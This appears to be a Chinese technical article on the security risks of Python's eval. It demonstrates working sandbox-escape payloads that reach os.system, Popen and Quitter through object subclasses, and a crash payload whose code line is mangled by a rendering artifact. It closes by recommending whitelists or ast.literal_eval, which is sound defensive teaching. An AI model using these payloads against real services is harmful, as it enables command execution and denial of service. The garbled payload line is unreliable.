自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

Python中eval帶來(lái)的潛在風(fēng)險(xiǎn)

開發(fā) 后端
從內(nèi)容我們可以看出,單單將內(nèi)置模塊置為空,是不夠的,最好的機(jī)制是構(gòu)造白名單,如果覺(jué)得比較麻煩,可以使用ast.literal_eval代替不安全的eval。

0x00 前言

eval是Python用于執(zhí)行python表達(dá)式的一個(gè)內(nèi)置函數(shù),使用eval,可以很方便的將字符串動(dòng)態(tài)執(zhí)行。比如下列代碼:

1

2

3

4

>>> eval("1+2")

3

>>> eval("[x for x in range(10)]")

[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]

當(dāng)內(nèi)存中的內(nèi)置模塊含有os的話,eval同樣可以做到命令執(zhí)行:

1

2

3

4

>>> import os

>>> eval("os.system('whoami')")

win-20140812chj\administrator

0

當(dāng)然,eval只能執(zhí)行Python的表達(dá)式類型的代碼,不能直接用它進(jìn)行import操作,但exec可以。如果非要使用eval進(jìn)行import,則使用__import__

1

2

3

4

5

6

7

8

9

10

11

>>> exec('import os')

>>> eval('import os')

Traceback (most recent call last):

  File "<stdin>", line 1, in <module>

  File "<string>", line 1

    import os

         ^

SyntaxError: invalid syntax

>>> eval("__import__('os').system('whoami')")

win-20140812chj\administrator

0

在實(shí)際的代碼中,往往有使用客戶端數(shù)據(jù)帶入eval中執(zhí)行的需求。比如動(dòng)態(tài)模塊的引入,舉個(gè)栗子,一個(gè)在線爬蟲平臺(tái)上爬蟲可能有多個(gè)并且位于不同的 模塊中,服務(wù)器端但往往只需要調(diào)用用戶在客戶端選擇的爬蟲類型,并通過(guò)后端的exec或者eval進(jìn)行動(dòng)態(tài)調(diào)用,后端編碼實(shí)現(xiàn)非常方便。但如果對(duì)用戶的請(qǐng) 求處理不恰當(dāng),就會(huì)造成嚴(yán)重的安全漏洞。

0x01 “安全”使用eval

現(xiàn)在提倡最多的就是使用eval的后兩個(gè)參數(shù)來(lái)設(shè)置函數(shù)的白名單:

Eval函數(shù)的聲明為eval(expression[, globals[, locals]])

其中,第二三個(gè)參數(shù)分別指定能夠在eval中使用的函數(shù)等,如果不指定,默認(rèn)為globals()和locals()函數(shù)中 包含的模塊和函數(shù)。

1

2

3

4

5

6

7

8

9

10

11

>>> import os

>>> 'os' in globals()

True

>>> eval('os.system(\'whoami\')')

win-20140812chj\administrator

0

>>> eval('os.system(\'whoami\')',{},{})

Traceback (most recent call last):

  File "<stdin>", line 1, in <module>

  File "<string>", line 1, in <module>

NameError: name 'os' is not defined

如果指定只允許調(diào)用abs函數(shù),可以使用下面的寫法:

1

2

3

4

5

6

7

8

9

10

>>> eval('abs(-20)',{'abs':abs},{'abs':abs})

20

>>> eval('os.system(\'whoami\')',{'abs':abs},{'abs':abs})

Traceback (most recent call last):

  File "<stdin>", line 1, in <module>

  File "<string>", line 1, in <module>

NameError: name 'os' is not defined

>>> eval('os.system(\'whoami\')')

win-20140812chj\administrator

0

使用這種方法來(lái)防護(hù),確實(shí)可以起到一定的作用,但是,這種處理方法可能會(huì)被繞過(guò),從而造成其他問(wèn)題!

0x02 繞過(guò)執(zhí)行代碼1

被繞過(guò)的情景如下,小明知道了eval會(huì)帶來(lái)一定的安全風(fēng)險(xiǎn),所以使用如下的手段去防止eval執(zhí)行任意代碼:

1

2

3

4

5

6

7

8

env = {}

env["locals"]   = None

env["globals"= None

env["__name__"] = None

env["__file__"] = None

env["__builtins__"] = None

 

eval(users_str, env)

Python中的__builtins__是內(nèi)置模塊,用來(lái)設(shè)置內(nèi)置函數(shù)的模塊。比如熟悉的abs,open等內(nèi)置函數(shù),都是在該模塊中以字典的方式存儲(chǔ)的,下面兩種寫法是等價(jià)的:

1

2

3

4

>>> __builtins__.abs(-20)

20

>>> abs(-20)

20

我們也可以自定義內(nèi)置函數(shù),并像使用Python中的內(nèi)置函數(shù)一樣使用它們:

1

2

3

4

5

>>> def hello():

...     print 'shabi'

>>> __builtin__.__dict__['say_hello'] = hello

>>> say_hello()

shabi

小明將eval函數(shù)的作用域中的內(nèi)置模塊設(shè)置為None,好像看起來(lái)很徹底了,但依然可以被繞過(guò)。__builtins____builtin__的一個(gè)引用,在__main__模塊下,兩者是等價(jià)的:

1

2

3

4

>>> id(__builtins__)

3549136

>>> id(__builtin__)

3549136

根據(jù)烏云drops提到的方法,使用如下代碼即可:

1

[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == "zipimporter"][0]("/home/liaoxinxi/eval_test/configobj-4.4.0-py2.5.egg").load_module("configobj").os.system("uname")

上面的代碼首先利用__class____subclasses__動(dòng)態(tài)加載了object對(duì) 象,這是因?yàn)閑val中無(wú)法直接使用object。然后使用object的子類的zipimporter對(duì)egg壓縮文件中的configobj模塊進(jìn)行 導(dǎo)入,并調(diào)用其內(nèi)置模塊中的os模塊從而實(shí)現(xiàn)命令執(zhí)行,當(dāng)然,前提是要有configobj的egg文件。 configobj模塊很有意思,居然內(nèi)置了os模塊:

1

2

3

4

5

6

7

8

9

10

11

>>> "os" in configobj.__dict__

True

>>> import urllib

>>> "os" in urllib.__dict__

True

>>> import urllib2

>>> "os" in urllib2.__dict__

True

>>> configobj.os.system("whoami")

win-20140812chj\administrator

0

和configobj類似的模塊如urllib,urllib2,setuptools等都有os的內(nèi)置,理論上使用哪個(gè)都行。 如果無(wú)法下載egg壓縮文件,可以下載帶有setup.py的文件夾,加入:

1

from setuptools import setup, find_packages 

然后執(zhí)行:

1

python setup.py bdist_egg

就可以在dist文件夾中找到對(duì)應(yīng)的egg文件。 繞過(guò)demo如下:

1

2

3

4

5

6

7

8

9

10

11

12

13

>>> env = {}

>>> env["locals"]   = None

>>> env["globals"= None

>>> env["__name__"] = None

>>> env["__file__"] = None

>>> env["__builtins__"] = None

>>> users_str = "[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == 'zipimporter'][0]('E:/internships/configobj-5.0.5-py2.7.egg').load_module('configobj').os.system('whoami')"

>>> eval(users_str, env)

win-20140812chj\administrator

0

>>> eval(users_str, {}, {})

win-20140812chj\administrator

0

0x03 拒絕服務(wù)攻擊1

object的子類中有很多有趣的東西,執(zhí)行以下代碼查看:

1

[x.__name__ for x in ().__class__.__bases__[0].__subclasses__()]

這里我就不輸出結(jié)果了,如果你執(zhí)行的話,可以看到很多有趣的模塊,比如file,zipimporter,Quitter等。經(jīng)過(guò)測(cè)試,file的構(gòu)造函數(shù)是被解釋器沙箱隔離的。 簡(jiǎn)單的,或者直接使object暴露出的子類Quitter進(jìn)行退出:

1

2

3

4

>>> eval("[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__

 == 'Quitter'][0](0)()", {'__builtins__':None})

 

C:/>

如果運(yùn)氣好,遇到對(duì)方程序中導(dǎo)入了os等敏感模塊,那么Popen就可以用,并且繞過(guò)__builins__為空的限制,栗子如下:

1

2

3

4

5

6

7

8

9

10

11

>>> import subprocess

>>> eval("[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == 'Popen'][0](['ping','-n','1','127.0.0.1'])",{'__builtins__':None})

<subprocess.Popen object at 0x0324FF70>

>>>

正在 Ping 127.0.0.1 具有 32 字節(jié)的數(shù)據(jù):

來(lái)自 127.0.0.1 的回復(fù): 字節(jié)=32 時(shí)間<1ms TTL=64

127.0.0.1 的 Ping 統(tǒng)計(jì)信息:

    數(shù)據(jù)包: 已發(fā)送 = 1,已接收 = 1,丟失 = 0 (0% 丟失),

往返行程的估計(jì)時(shí)間(以毫秒為單位):

    最短 = 0ms,最長(zhǎng) = 0ms,平均 = 0ms

>>>

事實(shí)上,這種情況非常多,比如導(dǎo)入os模塊,一般用來(lái)處理路徑問(wèn)題。所以說(shuō),遇到這種情況,完全可以列舉大量的功能函數(shù),來(lái)探測(cè)目標(biāo)object的子類中是否含有一些危險(xiǎn)的函數(shù)可以直接使用。

0x04 拒絕服務(wù)攻擊2

同樣,我們甚至可以繞過(guò)__builtins__為None,造成一次拒絕服務(wù)攻擊,Payload(來(lái)自老外blog)如下:

1

>>> eval('(lambda fc=(lambda n: [c 1="c" 2="in" 3="().__class__.__bases__[0" language="for"][/c].__subclasses__() if c.__name__ == n][0]):fc("function")(fc("code")(0,0,0,0,"KABOOM",(),(),(),"","",0,""),{})())()', {"__builtins__":None})

運(yùn)行上面的代碼,Python直接crash掉了,造成拒絕服務(wù)攻擊。 原理是通過(guò)嵌套的lambda來(lái)構(gòu)造一片代碼段,即code對(duì)象。為這個(gè)code對(duì)象分配空的棧,并給出相應(yīng)的代碼字符串,這里是KABOOM,在空棧上執(zhí)行代碼,會(huì)出現(xiàn)crash。構(gòu)造完成后,調(diào)用fc函數(shù)即可觸發(fā),其思路不可謂不淫蕩。

0x05 總結(jié)

從上面的內(nèi)容我們可以看出,單單將內(nèi)置模塊置為空,是不夠的,最好的機(jī)制是構(gòu)造白名單,如果覺(jué)得比較麻煩,可以使用ast.literal_eval代替不安全的eval

參考資料:

【1】http://nedbatchelder.com/blog/201206/eval_really_is_dangerous.html

【2】http://drops.wooyun.org/web/7490

【3】http://stackoverflow.com/questions/3513292/python-make-eval-safe

責(zé)任編輯:王雪燕 來(lái)源: 隱形人真忙
Pythoneval風(fēng)險(xiǎn)
相關(guān)推薦

2015-09-17 09:30:50

云架構(gòu)可伸縮性風(fēng)險(xiǎn)

2019-12-20 13:51:30

加密劫持網(wǎng)絡(luò)攻擊漏洞

2023-06-09 07:11:56

2020-03-02 08:25:38

免費(fèi)開源軟件FOSS軟件安全

2024-04-25 08:22:43

AndroidlargeHeap屬性

2018-03-08 09:57:15

2022-02-18 16:23:45

元宇宙元宇宙治理問(wèn)題

2023-03-28 10:13:04

2021-03-22 16:55:14

Java程序員內(nèi)存

2014-08-20 10:07:02

2015-02-28 15:22:15

2021-12-31 16:10:46

穩(wěn)定幣數(shù)字貨幣貨幣

2017-11-06 11:15:51

智能機(jī)器人工智能機(jī)器學(xué)習(xí)

2010-10-26 09:35:09

2024-05-08 08:00:00

2021-03-17 10:09:26

IT高管數(shù)字化轉(zhuǎn)型數(shù)字化

2015-01-15 09:38:30

2013-07-16 09:15:29

2022-08-01 16:43:07

機(jī)器身份網(wǎng)絡(luò)安全自動(dòng)化

2015-01-09 09:35:11

點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)